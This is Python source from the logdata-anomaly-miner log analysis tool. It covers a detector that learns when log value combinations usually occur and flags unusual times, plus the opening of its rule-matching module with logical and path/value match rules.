The considered time intervals originate of events with the same combination of values in the target_paths of target_path_list. @param log_atom the parsed log atom @return True if this handler was really able to handle and process the match. """ for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return False if log_atom.atom_time is None: return False if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False match_dict = log_atom.parser_match.get_match_dictionary() # Skip paths from ignore_list. for ignore_path in self.ignore_list: if ignore_path in match_dict.keys(): return False # Get current index from combination of values of paths of target_path_list id_tuple = () for id_path in self.target_path_list: id_match = log_atom.parser_match.get_match_dictionary().get(id_path) if id_match is None: if self.allow_missing_values_flag is True: # Insert placeholder for id_path that is not available id_tuple += ("",) else: # Omit log atom if one of the id paths is not found. 
return False else: if isinstance(id_match.match_object, bytes): id_tuple += (id_match.match_object.decode(AminerConfig.ENCODING),) else: id_tuple += (id_match.match_object,) # Print message if combination of values is new if id_tuple not in self.appeared_time_list: additional_information = {"AffectedLogAtomValues": [str(repr(val))[2:-1] for val in id_tuple], "NewTime": log_atom.atom_time % self.time_period_length} msg = f"First time ({int(log_atom.atom_time % self.time_period_length)}) detected for [" for match_value in id_tuple: msg += str(match_value) + ", " msg = msg[:-2] + "]" self.print(msg, log_atom=log_atom, affected_path=self.target_path_list, additional_information=additional_information) self.appeared_time_list[id_tuple] = [log_atom.atom_time % self.time_period_length] self.counter_reduce_time_intervals[id_tuple] = 0 if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) else: # Checks if the time has already been observed if log_atom.atom_time % self.time_period_length not in self.appeared_time_list[id_tuple]: # Check and print a message if the new time is out of range of the observed times # The second query is needed when time intervals exceed over 0/self.time_period_length if all((abs(log_atom.atom_time % self.time_period_length - time) > self.max_time_diff) and (abs(log_atom.atom_time % self.time_period_length - time) < self.time_period_length - self.max_time_diff) for time in self.appeared_time_list[id_tuple]): additional_information = {"AffectedLogAtomValues": [str(repr(val))[2:-1] for val in id_tuple], "PreviousAppearedTimes": [float(val) for val in self.appeared_time_list[id_tuple]], "NewTime": log_atom.atom_time % self.time_period_length} msg = f"New time ({int(log_atom.atom_time % self.time_period_length)}) out of range of previously observed times " \ f"{[int(x) for x in 
self.appeared_time_list[id_tuple]]} detected for [" for match_value in id_tuple: msg += str(match_value) + ", " msg = msg[:-2] + "]" self.print(msg, log_atom=log_atom, affected_path=self.target_path_list, additional_information=additional_information) if not self.learn_mode: return True if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) # Add the new time to the time list and reduces the time list after num_reduce_time_list of times have been appended self.insert_and_reduce_time_intervals(id_tuple, log_atom.atom_time % self.time_period_length) return True def insert_and_reduce_time_intervals(self, id_tuple, new_time): """Add the new time to the time list and reduce the time list after num_reduce_time_list of times have been appended.""" # Increase the counter of new times since last reduction self.counter_reduce_time_intervals[id_tuple] += 1 # Get the index in which the new time is inserted if new_time > self.appeared_time_list[id_tuple][-1]: time_index = len(self.appeared_time_list[id_tuple]) else: time_index = next(index for index, time in enumerate(self.appeared_time_list[id_tuple]) if time > new_time) # Insert the new time self.appeared_time_list[id_tuple] = self.appeared_time_list[id_tuple][:time_index] + [new_time] +\ self.appeared_time_list[id_tuple][time_index:] # Reduce the time intervals, by removing the obsolete entries if self.counter_reduce_time_intervals[id_tuple] >= self.num_reduce_time_list: # Reset the counter self.counter_reduce_time_intervals[id_tuple] = 0 # Check every entry if it enlarges the time intervals, and remove it, if not. 
last_accepted_time = self.appeared_time_list[id_tuple][0] + self.time_period_length for index in range(len(self.appeared_time_list[id_tuple])-1, 0, -1): if last_accepted_time - self.appeared_time_list[id_tuple][index-1] < 2 * self.max_time_diff: del self.appeared_time_list[id_tuple][index] else: last_accepted_time = self.appeared_time_list[id_tuple][index] # Checks the last and first two time of the time list, and removes the obsolete entries if (len(self.appeared_time_list[id_tuple]) >= 4) and ( self.time_period_length + self.appeared_time_list[id_tuple][1] - self.appeared_time_list[id_tuple][-2] < 2 * self.max_time_diff): self.appeared_time_list[id_tuple] = self.appeared_time_list[id_tuple][1:len(self.appeared_time_list[ id_tuple])-1] elif self.time_period_length + self.appeared_time_list[id_tuple][0] - self.appeared_time_list[id_tuple][-2] <\ 2 * self.max_time_diff: self.appeared_time_list[id_tuple] = self.appeared_time_list[id_tuple][:len(self.appeared_time_list[ id_tuple])-1] elif self.time_period_length + self.appeared_time_list[id_tuple][1] - self.appeared_time_list[id_tuple][-1] <\ 2 * self.max_time_diff: self.appeared_time_list[id_tuple] = self.appeared_time_list[id_tuple][1:] def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" persist_data = [[], []] for id_tuple, time_list in self.appeared_time_list.items(): persist_data[0].append((id_tuple, time_list)) for id_tuple, counter in self.counter_reduce_time_intervals.items(): persist_data[1].append((id_tuple, counter)) 
PersistenceUtil.store_json(self.persistence_file_name, persist_data) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def load_persistence_data(self): """Load the persistence data from storage.""" persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: for id_tuple, time_list in persistence_data[0]: self.appeared_time_list[tuple(id_tuple)] = time_list for id_tuple, counter in persistence_data[1]: self.counter_reduce_time_intervals[tuple(id_tuple)] = counter logging.getLogger(AminerConfig.DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__) def print_persistence_event(self, event_type, event_data): """Print the persistence of component_name. Event_data specifies what information is output. @return a message with information about the persistence. @throws Exception when the output for the event_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Query if event_data has one of the stated formats if not (isinstance(event_data, list) and len(event_data) <= 1 and ((len(event_data) == 1 and ( isinstance(event_data[0], list) and len(event_data[0]) in [0, len(self.target_path_list)]) and all(isinstance(value, str) for value in event_data[0])) or len(event_data) == 0)): msg = "Event_data has the wrong format. " \ "The supported formats are [] and [path_value_list], where the path value list is a list of strings with the same " \ "length as the defined paths in the config." 
# NOTE(review): reflowed from a collapsed archive listing; this is the remainder of print_persistence_event (header on
# the previous line) followed by the opening of add_to_persistence_event, whose docstring continues on the next line.
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        # Convert path value lists to tuples. NOTE(review): this mutates the caller's event_data list in place.
        for i in range(len(event_data)):
            event_data[i] = tuple(event_data[i])
        if len(event_data) == 0:
            # Print the set of all appeared path values if no event_data is given
            values_set = set(self.appeared_time_list.keys())
            values_list = list(values_set)
            values_list.sort()
            string = f"Time intervals are tracked for the following path values: {values_list}"
        elif len(event_data) == 1:
            id_tuple = event_data[0]
            # Check if the path value is tracked
            if id_tuple not in self.appeared_time_list:
                return f"Persistence includes no information for {id_tuple}."
            # Calculate the current time intervals: each appeared time widened by max_time_diff and clipped to [0, time_period_length]
            time_intervals = [[max(0, t - self.max_time_diff), min(self.time_period_length, t + self.max_time_diff)] for t in
                              self.appeared_time_list[id_tuple]]
            # Add time intervals, when the time intervals exceed the time period length or undercut zero (wrap-around).
            if self.appeared_time_list[id_tuple][-1] + self.max_time_diff > self.time_period_length:
                time_intervals = [[0, self.appeared_time_list[id_tuple][-1] + self.max_time_diff - self.time_period_length]] + \
                    time_intervals
            if self.appeared_time_list[id_tuple][0] - self.max_time_diff < 0:
                time_intervals = time_intervals + \
                    [[self.appeared_time_list[id_tuple][0] - self.max_time_diff + self.time_period_length, self.time_period_length]]
            # Get the indices of the time windows which intersect and therefore are merged
            indices = [i for i in range(len(time_intervals) - 1) if time_intervals[i][1] > time_intervals[i + 1][0]]
            # Merge the time intervals (iterate in reverse so earlier indices stay valid after each removal)
            for index in reversed(indices):
                time_intervals[index + 1][0] = time_intervals[index][0]
                time_intervals = time_intervals[:index] + time_intervals[index + 1:]
            # Set output string
            string = f"The list of appeared times is {self.appeared_time_list[id_tuple]} and the resulting time intervals are " \
                     f"{time_intervals} for path value {id_tuple}"
        return string

    def add_to_persistence_event(self, event_type, event_data):
        """Add or
overwrite the information of event_data to the persistence of component_name.

        event_data must be [path_value_list, new_appeared_time]; the time is stored modulo time_period_length.
        @return a message with information about the addition to the persistence.
        @throws Exception when the addition of this special event using given event_data was not possible.
        """
        if event_type != f"Analysis.{self.__class__.__name__}":
            msg = "Event not from this source"
            logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        # Validate shape and element types before touching any state.
        if not isinstance(event_data, list) or len(event_data) != 2 or not isinstance(event_data[0], list) or \
                len(event_data[0]) != len(self.target_path_list) or not all(isinstance(value, str) for value in event_data[0]) or \
                not isinstance(event_data[1], (int, float)):
            msg = "Event_data has the wrong format. " \
                  "The supported format is [path_value_list, new_appeared_time], " \
                  "where path_value_list is a list of strings with the same length as paths defined in the config."
            logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        id_tuple = tuple(event_data[0])
        new_time = event_data[1]
        msg = ""
        if id_tuple not in self.appeared_time_list:
            # Print message if combination of values is new
            msg = f"First time ({new_time % self.time_period_length}) added for {id_tuple}"
            self.appeared_time_list[id_tuple] = [new_time % self.time_period_length]
            self.counter_reduce_time_intervals[id_tuple] = 0
        else:
            # Print a message if the new time is added to the list of observed times
            msg = f"New time ({new_time % self.time_period_length}) added to the range of previously observed times " \
                  f"{self.appeared_time_list[id_tuple]} for {id_tuple}"
            # Add the new time to the time list and reduce the time list after num_reduce_time_list of times have been appended
            self.insert_and_reduce_time_intervals(id_tuple, new_time % self.time_period_length)
        return msg

    def remove_from_persistence_event(self, event_type, event_data):
        """Remove the time given in event_data from the persistence of component_name.
        event_data must be [path_value_list, old_appeared_time]; a stored time counts as matching when it lies
        within 0.5 of old_appeared_time.
        @return a message with information about the removal from the persistence.
        @throws Exception when the removal using the given event_data was not possible.
        """
        if event_type != f"Analysis.{self.__class__.__name__}":
            msg = "Event not from this source"
            logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if not isinstance(event_data, list) or len(event_data) != 2 or not isinstance(event_data[0], list) or \
                len(event_data[0]) != len(self.target_path_list) or not all(isinstance(value, str) for value in event_data[0]) or \
                not isinstance(event_data[1], (int, float)):
            msg = "Event_data has the wrong format. " \
                  "The supported format is [path_value_list, old_appeared_time], " \
                  "where path_value_list is a list of strings with the same length as paths defined in the config."
            logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        id_tuple = tuple(event_data[0])
        new_time = event_data[1]
        if id_tuple not in self.appeared_time_list:
            # Print message if combination of values is new
            msg = f"{id_tuple} has previously not appeared"
        # NOTE(review): the comparison uses the raw new_time while the messages (and the add path) use
        # new_time % time_period_length -- confirm callers always pass a value already inside the period.
        elif not any(abs(new_time - val) < 0.5 for val in self.appeared_time_list[id_tuple]):
            # Print a message if the new time does not appear in the list of observed times
            msg = f"Time ({new_time % self.time_period_length}) does not appear in the previously observed times " \
                  f"{self.appeared_time_list[id_tuple]} for {id_tuple}"
        else:
            # Remove the old time from the time list (loop body continues on the next line of the listing).
# NOTE(review): reflowed from a collapsed archive listing; the loop below closes remove_from_persistence_event, whose
# header is two lines up. The line also carries the tar member header of the next file (Rules.py) and the opening of
# its module docstring, which continues on the next line.
            for index in reversed(range(len(self.appeared_time_list[id_tuple]))):
                if abs(new_time - self.appeared_time_list[id_tuple][index]) < 0.5:
                    self.appeared_time_list[id_tuple] = self.appeared_time_list[id_tuple][:index] + \
                        self.appeared_time_list[id_tuple][index + 1:]
            # Print a message that the time was removed from the list of observed times
            msg = f"Time ({new_time % self.time_period_length}) was removed from the range of previously observed times " \
                  f"{self.appeared_time_list[id_tuple]} for {id_tuple}"
        return msg

    def print(self, message, log_atom, affected_path, additional_information=None):
        """Print the message by forwarding it as an event to all registered anomaly event handlers.

        @param message the human readable message of the event.
        @param log_atom the LogAtom that triggered the event; its raw_data is decoded with AminerConfig.ENCODING.
        @param affected_path a single path or a list of paths that the event refers to.
        @param additional_information optional dict merged into the AnalysisComponent part of the event data.
        """
        if isinstance(affected_path, str):
            affected_path = [affected_path]
        if additional_information is None:
            additional_information = {}
        original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
        if self.output_logline:
            # With output_logline, all parsed paths are listed ahead of the prefixed original log line.
            tmp_str = ""
            for x in list(log_atom.parser_match.get_match_dictionary().keys()):
                tmp_str += " " + x + os.linesep
            tmp_str = tmp_str.lstrip(" ")
            sorted_log_lines = [tmp_str + original_log_line_prefix + log_atom.raw_data.decode(AminerConfig.ENCODING)]
            analysis_component = {"AffectedLogAtomPaths": list(log_atom.parser_match.get_match_dictionary().keys())}
        else:
            # Otherwise only the affected paths are listed and the raw line is emitted without prefix.
            tmp_str = ""
            for x in affected_path:
                tmp_str += " " + x + os.linesep
            tmp_str = tmp_str.lstrip(" ")
            sorted_log_lines = [tmp_str + log_atom.raw_data.decode(AminerConfig.ENCODING)]
            analysis_component = {"AffectedLogAtomPaths": affected_path}
        for key, value in additional_information.items():
            analysis_component[key] = value
        event_data = {"AnalysisComponent": analysis_component}
        for listener in self.anomaly_event_handlers:
            listener.receive_event(f"Analysis.{self.__class__.__name__}", message, sorted_log_lines, event_data, log_atom, self)
logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/Rules.py000066400000000000000000001200021500476301700324650ustar00rootroot00000000000000
"""This package contains various
classes to build check rulesets.

The ruleset also supports parallel rule evaluation, e.g. the two rules "A and B and C" and "A and B and D" will only perform
the checks for A and B once, then perform checks C and D and trigger a match action.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
"""

import re
import sys
import abc
import logging
from datetime import datetime, timezone

from aminer.util.History import LogarithmicBackoffHistory
from aminer.util.History import ObjectHistory
from aminer.analysis.AtomFilters import SubhandlerFilter
from aminer.AminerConfig import DEBUG_LOG_NAME, STAT_LOG_NAME
from aminer import AminerConfig
from aminer.events.EventInterfaces import EventHandlerInterface

# Format used by the __str__ methods of the combining rules: "<preamble>(<sub rule>)".
result_string = "%s(%s)"


class MatchAction(metaclass=abc.ABCMeta):
    """This is the interface of all match actions."""

    @abc.abstractmethod
    def match_action(self, log_atom):
        """Invoke this method if a rule has matched.

        @param log_atom the LogAtom matching the rules.
        """


class EventGenerationMatchAction(MatchAction):
    """This generic match action forwards information about a rule match on parsed data to a list of event handlers."""

    def __init__(self, event_type, event_message, event_handlers):
        """Create the action.

        @param event_type non-empty event type string passed to every handler.
        @param event_message message string passed to every handler.
        @param event_handlers non-empty list of EventHandlerInterface instances.
        @raises TypeError/ValueError on malformed arguments (checks continue on the next line of the listing).
        """
        self.event_type = event_type
        self.event_message = event_message
        self.event_handlers = event_handlers
        if not isinstance(event_type, str):
            msg = "event_type has to be of type string."
# NOTE(review): reflowed from a collapsed archive listing; the checks below finish EventGenerationMatchAction.__init__,
# whose header is on the previous line, and the block ends inside MatchRule.log_statistics' docstring.
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if len(event_type) == 0:
            msg = "event_type must not be empty."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if not isinstance(event_message, str):
            msg = "event_message has to be of type string."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if not isinstance(event_handlers, list) or not all(isinstance(x, EventHandlerInterface) for x in event_handlers):
            msg = "event_handlers has to be a list of EventHandlers."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if len(event_handlers) == 0:
            msg = "event_handlers must not be empty."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)

    def match_action(self, log_atom):
        """Invoke this method if a rule has matched.

        Sends the configured event type and message to every handler; the annotated match element is the only
        log line, and the shared event_data dict is passed to all handlers.
        @param log_atom the LogAtom matching the rules.
        """
        event_data = {}
        for handler in self.event_handlers:
            handler.receive_event(self.event_type, self.event_message, [log_atom.parser_match.match_element.annotate_match("")],
                                  event_data, log_atom, self)


class AtomFilterMatchAction(MatchAction, SubhandlerFilter):
    """This generic match rule forwards all rule matches to a list of AtomHandlerInterface instances using the SubhandlerFilter."""

    def __init__(self, subhandler_list, stop_when_handled_flag=False):
        """Create the action; argument validation is delegated to SubhandlerFilter.__init__."""
        SubhandlerFilter.__init__(self, subhandler_list, stop_when_handled_flag)

    def match_action(self, log_atom):
        """Invoke this method if a rule has matched.

        @param log_atom the LogAtom matching the rules.
        @return whatever SubhandlerFilter.receive_atom returns for the atom.
        """
        return self.receive_atom(log_atom)


class MatchRule(metaclass=abc.ABCMeta):
    """This is the interface of all match rules."""

    # Per-rule counters for log_statistics: atoms that matched vs. atoms evaluated since the last report.
    log_success = 0
    log_total = 0

    @abc.abstractmethod
    def match(self, log_atom):
        """Check if this rule matches.

        On match an optional match_action could be triggered.
        """

    def log_statistics(self, rule_id):
        """Log statistics of a MatchRule and recurse into sub rules.

        Override this method for more sophisticated statistics output of the MatchRule.
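"""
        if AminerConfig.STAT_LEVEL > 0:
            logging.getLogger(STAT_LOG_NAME).info("Rule '%s' processed %d out of %d log atoms successfully in the last 60 minutes.",
                                                  rule_id, self.log_success, self.log_total)
        self.log_success = 0
        self.log_total = 0
        # Recurse into whichever kind of child rules this subclass keeps.
        if hasattr(self, "sub_rules"):
            for i, rule in enumerate(self.sub_rules):
                rule.log_statistics(rule_id + "." + rule.__class__.__name__ + str(i))
        if hasattr(self, "rule_lookup_dict"):
            for i, rule_key in enumerate(self.rule_lookup_dict):
                rule = self.rule_lookup_dict[rule_key]
                rule.log_statistics(rule_id + "." + rule.__class__.__name__ + str(i))
        # default_rule is an optional attribute (ValueDependentDelegatedMatchRule stores None when none was configured),
        # so the attribute's presence alone is not enough -- skip it when unset.
        if getattr(self, "default_rule", None) is not None:
            self.default_rule.log_statistics(rule_id + ".default_rule." + self.default_rule.__class__.__name__)
        if hasattr(self, "sub_rule"):
            self.sub_rule.log_statistics(rule_id + "." + self.sub_rule.__class__.__name__)


class AndMatchRule(MatchRule):
    """This class provides a rule to match all subRules (logical and)."""

    def __init__(self, sub_rules, match_action=None):
        """Create the rule.

        @param sub_rules list of at least two MatchRule instances, evaluated in order.
        @param match_action if None, no action is performed.
        @raises TypeError when an argument has the wrong type, ValueError when fewer than two sub rules are given.
        """
        self.sub_rules = sub_rules
        self.match_action = match_action
        if not isinstance(sub_rules, list) or not all(isinstance(x, MatchRule) for x in sub_rules):
            msg = "sub_rules has to be a list of MatchRules."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if len(sub_rules) < 2:
            msg = "At least two sub rules must exist in the AndMatchRule."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if match_action is not None and not isinstance(match_action, MatchAction):
            msg = "match_action has to be of type MatchAction."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)

    def match(self, log_atom):
        """Check if this rule matches.

        Rule evaluation will stop when the first match fails. If a matchAction is attached to this rule, it will be invoked
        at the end of all checks.
        @return True when all subrules matched.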
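"""
        self.log_total += 1
        for rule in self.sub_rules:
            if not rule.match(log_atom):
                return False
        if self.match_action is not None:
            self.match_action.match_action(log_atom)
        self.log_success += 1
        return True

    def __str__(self):
        """Render as "(A) and (B) and ..." using result_string for each sub rule."""
        result = ""
        preamble = ""
        for match_element in self.sub_rules:
            result += result_string % (preamble, match_element)
            preamble = " and "
        return result


class OrMatchRule(MatchRule):
    """This class provides a rule to match any subRules (logical or)."""

    def __init__(self, sub_rules, match_action=None):
        """Create the rule.

        @param sub_rules list of at least two MatchRule instances, evaluated in order until one matches.
        @param match_action if None, no action is performed.
        @raises TypeError when an argument has the wrong type, ValueError when fewer than two sub rules are given.
        """
        self.sub_rules = sub_rules
        self.match_action = match_action
        if not isinstance(sub_rules, list) or not all(isinstance(x, MatchRule) for x in sub_rules):
            msg = "sub_rules has to be a list of MatchRules."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if len(sub_rules) < 2:
            # The message previously named AndMatchRule (copy-paste); it now names this class.
            msg = "At least two sub rules must exist in the OrMatchRule."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if match_action is not None and not isinstance(match_action, MatchAction):
            msg = "match_action has to be of type MatchAction."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)

    def match(self, log_atom):
        """Check if this rule matches.

        Rule evaluation will stop when the first match succeeds. If a matchAction is attached to this rule, it will be
        invoked after the first match.
        @return True when any subrule matched.
        """
        self.log_total += 1
        for rule in self.sub_rules:
            if rule.match(log_atom):
                if self.match_action is not None:
                    self.match_action.match_action(log_atom)
                self.log_success += 1
                return True
        return False

    def __str__(self):
        """Render as "(A) or (B) or ..." using result_string for each sub rule."""
        result = ""
        preamble = ""
        for match_element in self.sub_rules:
            result += result_string % (preamble, match_element)
            preamble = " or "
        return result


class ParallelMatchRule(MatchRule):
    """This class is a rule testing all the subrules in parallel.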
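    From the behaviour it is similar to the OrMatchRule, returning true if any subrule matches. The difference is that
    matching will not stop after the first positive match. This does only make sense when all subrules have match actions
    associated.
    """

    def __init__(self, sub_rules, match_action=None):
        """Create the rule.

        @param sub_rules list of at least two MatchRule instances; every one is evaluated on every atom.
        @param match_action if None, no action is performed.
        @raises TypeError when an argument has the wrong type, ValueError when fewer than two sub rules are given.
        """
        self.sub_rules = sub_rules
        self.match_action = match_action
        if not isinstance(sub_rules, list) or not all(isinstance(x, MatchRule) for x in sub_rules):
            msg = "sub_rules has to be a list of MatchRules."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if len(sub_rules) < 2:
            # The message previously named AndMatchRule (copy-paste); it now names this class.
            msg = "At least two sub rules must exist in the ParallelMatchRule."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if match_action is not None and not isinstance(match_action, MatchAction):
            msg = "match_action has to be of type MatchAction."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)

    def match(self, log_atom):
        """Check if any of the subrules rule matches.

        The matching procedure will not stop after the first positive match. If a matchAction is attached to this rule, it
        will be invoked at the end of all checks.
        @return True when any subrule matched.
        """
        self.log_total += 1
        match_flag = False
        for rule in self.sub_rules:
            if rule.match(log_atom):
                match_flag = True
        if match_flag and (self.match_action is not None):
            self.match_action.match_action(log_atom)
        if match_flag:
            self.log_success += 1
        return match_flag

    def __str__(self):
        """Render as "(A) por (B) por ..." ("por" = parallel or) using result_string for each sub rule."""
        result = ""
        preamble = ""
        for match_element in self.sub_rules:
            result += result_string % (preamble, match_element)
            preamble = " por "
        return result


class ValueDependentDelegatedMatchRule(MatchRule):
    """This class is a rule delegating rule checking to subrules depending on values found within the parser_match.

    The result of this rule is the result of the selected delegation rule.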
"""

    def __init__(self, target_path_list, rule_lookup_dict, default_rule=None, match_action=None):
        """
        Create the rule.

        @param target_path_list with value paths that are used to extract the lookup keys for rule_lookup_dict. If value
        lookup fails, None will be used for lookup.
        @param rule_lookup_dict dictionary with tuple containing values for valuePathList as key and target rule as value.
        @param default_rule when not none, this rule will be executed as default. Otherwise, when rule lookup failed, False
        will be returned unconditionally.
        @param match_action if None, no action is performed.
        @raises TypeError when an argument has the wrong type, ValueError when target_path_list is empty or holds "".
        """
        self.target_path_list = target_path_list
        self.rule_lookup_dict = rule_lookup_dict
        self.default_rule = default_rule
        self.match_action = match_action
        if not isinstance(target_path_list, list) or not all(isinstance(x, str) for x in target_path_list):
            msg = "target_path_list has to be a list of String."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if len(target_path_list) == 0 or not all(x != "" for x in target_path_list):
            msg = "target_path_list must not be empty."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        # Keys must be non-empty tuples so they can line up with the tuple built in match().
        if not isinstance(rule_lookup_dict, dict) or not all(isinstance(x, tuple) and len(x) != 0 for x in rule_lookup_dict.keys()) or \
                not all(isinstance(x, MatchRule) for x in rule_lookup_dict.values()):
            msg = "rule_lookup_dict has to be a dict of with tuples as keys and MatchRules as values."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if default_rule is not None and not isinstance(default_rule, MatchRule):
            msg = "default_rule has to be of type MatchRule."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if match_action is not None and not isinstance(match_action, MatchAction):
            msg = "match_action has to be of type MatchAction."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)

    def match(self, log_atom):
        """Try to locate a rule for delegation or use the default rule.

        The lookup key is the tuple of match_object values found for target_path_list, in list order; paths missing
        from the match dictionary are skipped rather than filled with a placeholder, so an atom missing one path
        yields a shorter tuple (and None when no path is present).
        @return True when selected delegation rule matched.
        """
        self.log_total += 1
        match_dict = log_atom.parser_match.get_match_dictionary()
        value_list = []
        for path in self.target_path_list:
            value_element = match_dict.get(path)
            if value_element is not None:
                value_list.append(value_element.match_object)
        if len(value_list) > 0:
            value = tuple(value_list)
        else:
            value = None
        rule = self.rule_lookup_dict.get(value, self.default_rule)
        if rule is None:
            return False
        if rule.match(log_atom):
            if self.match_action is not None:
                self.match_action.match_action(log_atom)
            self.log_success += 1
            return True
        return False

    def __str__(self):
        result = "ValueDependentDelegatedMatchRule"
        return result


class NegationMatchRule(MatchRule):
    """Match elements of this class return true when the subrule did not match."""

    def __init__(self, sub_rule, match_action=None):
        """Create the rule.

        @param sub_rule the MatchRule whose result is inverted.
        @param match_action if None, no action is performed.
        @raises TypeError when an argument has the wrong type.
        """
        self.sub_rule = sub_rule
        self.match_action = match_action
        if not isinstance(sub_rule, MatchRule):
            msg = "sub_rule has to be of type MatchRule."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if match_action is not None and not isinstance(match_action, MatchAction):
            msg = "match_action has to be of type MatchAction."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)

    def match(self, log_atom):
        """Check if this rule matches.

        On match an optional match_action could be triggered. Note that the sub rule's own match_action (if any) still
        fires inside sub_rule.match() even though this rule then reports False.
        """
        self.log_total += 1
        if self.sub_rule.match(log_atom):
            return False
        if self.match_action is not None:
            self.match_action.match_action(log_atom)
        self.log_success += 1
        return True

    def __str__(self):
        return f"not {self.sub_rule}"


class PathExistsMatchRule(MatchRule):
    """Match elements of this class return true when the given target_path was found in the parsed match data."""

    def __init__(self, target_path, match_action=None):
        """Create the rule.

        @param target_path non-empty parser path to look for.
        @param match_action if None, no action is performed.
        """
        self.target_path = target_path
        self.match_action = match_action
        if not isinstance(target_path, str):
            msg = "target_path has to be of type String."
# NOTE(review): reflowed from a collapsed archive listing; the checks below finish PathExistsMatchRule.__init__, whose
# header is on the previous line, and the block ends inside ValueMatchRule.match's docstring.
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if target_path == "":
            msg = "target_path must not be empty."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if match_action is not None and not isinstance(match_action, MatchAction):
            msg = "match_action has to be of type MatchAction."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)

    def match(self, log_atom):
        """Check if this rule matches.

        On match an optional match_action could be triggered.
        @return True when target_path is a key of the atom's match dictionary.
        """
        self.log_total += 1
        if self.target_path in log_atom.parser_match.get_match_dictionary():
            if self.match_action is not None:
                self.match_action.match_action(log_atom)
            self.log_success += 1
            return True
        return False

    def __str__(self):
        return f"hasPath({self.target_path})"


class ValueMatchRule(MatchRule):
    """Match elements of this class return true when the given target_path exists and has exactly the given parsed value."""

    def __init__(self, target_path, value, match_action=None):
        """Create the rule.

        @param target_path non-empty parser path whose match_object is compared.
        @param value the expected value; str and bytes are compared across the two types, an empty str/bytes is rejected.
        @param match_action if None, no action is performed.
        @raises TypeError when an argument has the wrong type, ValueError for an empty path or empty str/bytes value.
        """
        self.target_path = target_path
        self.value = value
        self.match_action = match_action
        if not isinstance(target_path, str):
            msg = "target_path has to be of type String."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if target_path == "":
            msg = "target_path must not be empty."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
